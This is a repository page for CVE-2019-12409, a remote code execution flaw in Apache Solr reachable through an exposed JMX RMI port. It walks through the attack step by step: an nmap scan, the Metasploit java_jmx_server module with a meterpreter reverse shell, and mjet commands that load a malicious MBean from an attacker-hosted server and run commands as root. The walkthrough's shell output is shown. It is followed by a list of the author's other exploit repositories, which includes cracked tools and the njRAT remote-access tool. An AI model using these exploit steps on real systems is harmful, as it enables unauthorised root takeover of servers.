• Stars
    star
    103
  • Rank 333,046 (Top 7 %)
  • Language
    Python
  • Created about 5 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")

CVE-2019-12409 Apache Solr RCE

ENABLE_REMOTE_JMX_OPTS="true"

root@kali:/opt/solr-8.1.1/bin# cat solr.in.sh |grep true
# Set to true to activate the JMX RMI connector to allow remote JMX client applications
ENABLE_REMOTE_JMX_OPTS="true"
#SOLR_OPTS="$SOLR_OPTS -Dsolr.clustering.enabled=true"
# Enables log rotation before starting Solr. Setting SOLR_LOG_PRESTART_ROTATION=true will let Solr take care of pre
# Enables HTTPS. It is implictly true if you set SOLR_SSL_KEY_STORE. Use this config
#SOLR_SSL_ENABLED=true
#SOLR_SSL_CHECK_PEER_NAME=true

nmap scan info

root@kali:/opt/mjet# nmap -p 18983 -Pn -T5 -n -sC -sV 10.10.20.166 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 17:00 CST
Nmap scan report for 10.10.20.166
Host is up (0.00016s latency).

PORT      STATE SERVICE  VERSION
18983/tcp open  java-rmi Java RMI
| rmi-dumpregistry: 
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:18983
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
root@kali:/opt/mjet# 

0x01 use msf

msf5 exploit(multi/misc/java_jmx_server) > show options 

Module options (exploit/multi/misc/java_jmx_server):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
   JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
   JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
   RHOSTS        10.10.20.166     yes       The target address range or CIDR identifier
   RPORT         18983            yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.20.166     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf5 exploit(multi/misc/java_jmx_server) > run

[*] Started reverse TCP handler on 10.10.20.166:4444 
[*] 10.10.20.166:18983 - Using URL: http://0.0.0.0:8080/2kDic5
[*] 10.10.20.166:18983 - Local IP: http://10.10.20.166:8080/2kDic5
[*] 10.10.20.166:18983 - Sending RMI Header...
[*] 10.10.20.166:18983 - Discovering the JMXRMI endpoint...
[+] 10.10.20.166:18983 - JMXRMI endpoint on 127.0.1.1:18983
[*] 10.10.20.166:18983 - Proceeding with handshake...
[+] 10.10.20.166:18983 - Handshake with JMX MBean server on 127.0.1.1:18983
[*] 10.10.20.166:18983 - Loading payload...
[*] 10.10.20.166:18983 - Replied to request for mlet
[*] 10.10.20.166:18983 - Replied to request for payload JAR
[*] 10.10.20.166:18983 - Executing payload...
[*] Sending stage (53845 bytes) to 10.10.20.166
[*] Meterpreter session 2 opened (10.10.20.166:4444 -> 10.10.20.166:48474) at 2019-11-19 16:39:49 +0800

meterpreter > sysinfo
Computer    : kali
OS          : Linux 4.19.0-kali1-amd64 (amd64)
Meterpreter : java/linux
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/opt/solr-8.1.1/server
ls
contexts
etc
lib
logs
modules
README.txt
resources
scripts
solr
solr-webapp
start.jar
exit
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/misc/java_jmx_server) > 

0x02 use mjet

usage:

java -jar jython-standalone-2.7.0.jar mjet.py 10.10.20.166 18983 install super_secret http://10.10.20.166:8000/ 8000

java -jar jython-standalone-2.7.0.jar mjet.py 127.0.0.1 18983 command super_secret "id&&pwd&&ls"

mlet

<html>
<mlet code="de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload" archive="qgmncrbu.jar" name="MogwaiLabs:name=payload,id=1" codebase="http://10.10.20.166:8000/">
</mlet>
</html>

attack example

root@kali:/opt/mjet# java -jar jython-standalone-2.7.0.jar mjet.py 10.10.20.166 18983 install super_secret http://10.10.20.166:8000/ 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.10.20.166:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  18
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.10.20.166:8000/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
<html><mlet code="de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload" archive="qgmncrbu.jar" name="MogwaiLabs:name=payload,id=1" codebase="http://10.10.20.166:8000/"></mlet></html>
10.10.20.166 - - [19/Nov/2019 03:39:17] "GET / HTTP/1.1" 200 -
[+] Object instance already existed, no need to install it a second time
[+] Done
root@kali:/opt/mjet# java -jar jython-standalone-2.7.0.jar mjet.py 127.0.0.1 18983 command super_secret "id&&pwd&&ls"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  19
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: id&&pwd&&ls
uid=0(root) gid=0(root) groups=0(root)
/opt/solr-8.1.1/server
contexts
etc
lib
logs
modules
README.txt
resources
scripts
solr
solr-webapp
start.jar


[+] Done
root@kali:/opt/mjet# 

参考链接:

https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/

https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server

https://github.com/mogwailabs/mjet

More Repositories

1

0day-security-software-vulnerability-analysis-technology

0day安全_软件漏洞分析技术
C
547
star
2

IDA_Pro_7.2

IDA_Pro_7.2
Shell
487
star
3

oracleShell

oracle 数据库命令执行
439
star
4

Log4j2-CVE-2021-44228

Remote Code Injection In Log4j
434
star
5

CVE-2020-5902

CVE-2020-5902 BIG-IP
Java
376
star
6

Grafana-CVE-2021-43798

Grafana Unauthorized arbitrary file reading vulnerability
Go
329
star
7

St2-057

St2-057 Poc Example
Shell
314
star
8

CVE-2019-13272

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root
C
301
star
9

CVE-2020-14882

CVE-2020–14882、CVE-2020–14883
277
star
10

CVE-2019-1388

CVE-2019-1388 UAC提权 (nt authority\system)
174
star
11

cve-2019-2618

Weblogic Upload Vuln(Need username password)-CVE-2019-2618
Python
170
star
12

OA-tongda-RCE

Office Anywhere网络智能办公系统
PHP
146
star
13

CVE-2019-3396

Confluence 未授权 RCE (CVE-2019-3396) 漏洞
Python
146
star
14

ncDecode

用友nc数据库密码解密
138
star
15

CVE-2018-17182

Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day
C
129
star
16

gitlab-SSRF-redis-RCE

GitLab 11.4.7 SSRF配合redis远程执行代码
Shell
120
star
17

2018-QWB-CTF

2018强网杯CTF___题目整理
Python
114
star
18

fuzz-wooyun-org

WooYun Fuzz 库
PHP
107
star
19

solr_rce

Apache Solr RCE via Velocity template
Python
104
star
20

OA-Seeyou

note
Java
104
star
21

CVE-2019-11580

CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE
Python
101
star
22

CVE-2018-2628

Weblogic 反序列化漏洞(CVE-2018-2628)
Python
101
star
23

CVE-2019-12384

Jackson Rce For CVE-2019-12384
Ruby
98
star
24

SpringBoot_Actuator_RCE

SpringBoot_Actuator_RCE
96
star
25

CVE-2019-11043

php-fpm+Nginx RCE
Python
96
star
26

CVE-2019-11581

Atlassian JIRA Template injection vulnerability RCE
91
star
27

kibana-RCE

kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609
90
star
28

CVE-2019-0193

Apache Solr DataImport Handler RCE
Python
89
star
29

CVE-2020-8193

Citrix ADC Vulns
Python
85
star
30

CVE-2019-19781

Citrix ADC Remote Code Execution
Python
83
star
31

CVE-2020-2551

Weblogic RCE with IIOP
82
star
32

e-cology

e-cology OA_Beanshell_RCE
Java
80
star
33

zentao-getshell

禅道8.2 - 9.2.1前台Getshell
Python
79
star
34

CVE-2019-7238

Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0
Python
77
star
35

jackson-CVE-2020-8840

FasterXML/jackson-databind 远程代码执行漏洞
Java
76
star
36

Redis-RCE

remote code execute for redis4 and redis5
Python
73
star
37

FinalShellDecodePass

FinalShellDecodePass 加密解密
Java
73
star
38

SHIRO-721

RememberMe Padding Oracle Vulnerability RCE
71
star
39

xxl-job

xxl-job RESTful API RCE
70
star
40

CVE-2019-0232

Apache Tomcat Remote Code Execution on Windows - CGI-BIN
Python
69
star
41

CVE-2019-16278

Directory transversal to remote code execution
Shell
69
star
42

Ubuntu-0day

all 4.4 ubuntu aws instances are vulnerable
C
66
star
43

CVE-2018-3191

Weblogic-CVE-2018-3191远程代码命令执行漏洞
Python
63
star
44

fastjson-RCE

fastjson-1.2.47
62
star
45

CVE-2019-2888

WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
Java
59
star
46

Shiro_Xray

CommonsBeanutils1,CommonsCollectionsK1
Python
58
star
47

CVE-2019-15107

CVE-2019-15107 Webmin RCE (unauthorized)
Python
57
star
48

St2-052

St2-052
56
star
49

cve-2018-1273

Spring Data Commons RCE 远程命令执行漏洞
Python
56
star
50

CVE-2019-11510-1

SSL VPN Rce
Python
54
star
51

GitlabVer

gitlab version index
Shell
52
star
52

SHIRO-550

Shiro RememberMe 1.2.4 反序列化 漏洞
Python
52
star
53

webuploader-0.1.15-Demo

webuploader-v-0.1.15未授权-任意文件上传
52
star
54

BurpSuite_Pro_v1.7.37

Java
51
star
55

CVE-2020-17008

CVE-2020-17008 splWOW64 Elevation of Privilege
51
star
56

DBconfigReader

泛微ecology OA系统接口存在数据库配置信息泄露漏洞
50
star
57

SqlMap_BurpSuite

SqlMap_BurpSuite
Java
44
star
58

msfconsole-termux

How To Install Metasploit-Table on the Android Termux
Shell
42
star
59

CVE-2019-2890

CVE-2019-2890 WebLogic 反序列化RCE漏洞
41
star
60

cs_yara

check cs yara rules
YARA
40
star
61

st2-048

st2-048
Python
40
star
62

database-spring-ENC

sprint encode (plan text) get enc password
Java
39
star
63

mssql-command-tool

mssql 终端连接工具|命令执行
Go
38
star
64

BurpSuite-Plugin

Plugin For BurpSuite (Pentester)
JavaScript
38
star
65

fastjson-1.2.60-rce

autoType enable
36
star
66

Burp_AES_Plugin

Burpsuite Plugin For AES Crack
Java
35
star
67

mimikat_ssp

Security Support Provider Interface
C++
35
star
68

ThinkCMF_getshell

ThinkCMF 框架上的任意内容包含漏洞
Python
35
star
69

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444
35
star
70

ChromePluginCrx

离线安装Chrome插件-插件备份
33
star
71

JWT_Brute

JWT_Brute
32
star
72

CVE-2020-1947

Apache ShardingSphere UI YAML解析远程代码执行漏洞
32
star
73

CVE-2019-15642

Webmin Remote Code Execution (authenticated)
Python
32
star
74

fastjson-1.2.61-RCE

fastjson-1.2.61-RCE
Java
32
star
75

CVE-2019-8451

Jira未授权SSRF漏洞
Python
31
star
76

fastjson-1.2.58-rce

fastjson-1.2.58-rce with h2 database
Java
31
star
77

Fortify_Rule

Decode Fortify Rule Bin File Get XML File
Java
29
star
78

CVE-2020-26259

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.
Java
28
star
79

IDA7.0-Pro

some people share IDA7.0!
25
star
80

S2-045-EXP-POC-TOOLS

S2-045 漏洞 POC-TOOLS CVE-2017-5638
Python
25
star
81

OpenFire_Decrypt

OpenFire 管理后台账号密码解密
Java
24
star
82

njRAT-0.7

远控工具Njrat
24
star
83

CVE-2018-14847

MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞
Python
24
star
84

CVE-2019-20197

Nagios XI远程命令执行漏洞 <v5.6.9
23
star
85

CVE-2019-16759

vBulletin 5.x 未授权远程代码执行漏洞
Python
22
star
86

st2-046-poc

st2-046-poc CVE-2017-5638
Shell
22
star
87

Jboss_JMXInvokerServlet_Deserialization_RCE

Jboss_JMXInvokerServlet_Deserialization_RCE
21
star
88

CVE-2019-10392

CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)
21
star
89

CVE-2018-10933

libssh CVE-2018-10933
Python
20
star
90

010-Editor-Template

20
star
91

Java-Compressed-file-security

java web 压缩文件 安全 漏洞
Python
19
star
92

Vmware_vCenter

VMware vCenter(Unauthenticated)
18
star
93

PHPStudy-Backdoor

phpstudy dll backdoor for v2016 and v2018
PHP
18
star
94

CVE-2019-3394

Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞
17
star
95

CTF-RSA-tool

CTF-RSA-tool
C
17
star
96

Security_Article

scrapy website Article and link ...
HTML
17
star
97

Hscan

Hscan-Win-Gui
Python
16
star
98

CVE-2018-2894

Weblogic,CVE-2018-2894
Python
16
star
99

BurpSuite-icns

制作BurpSuite icns 在Mac OS上
16
star
100

phpweb

phpweb 前台任意文件上传
16
star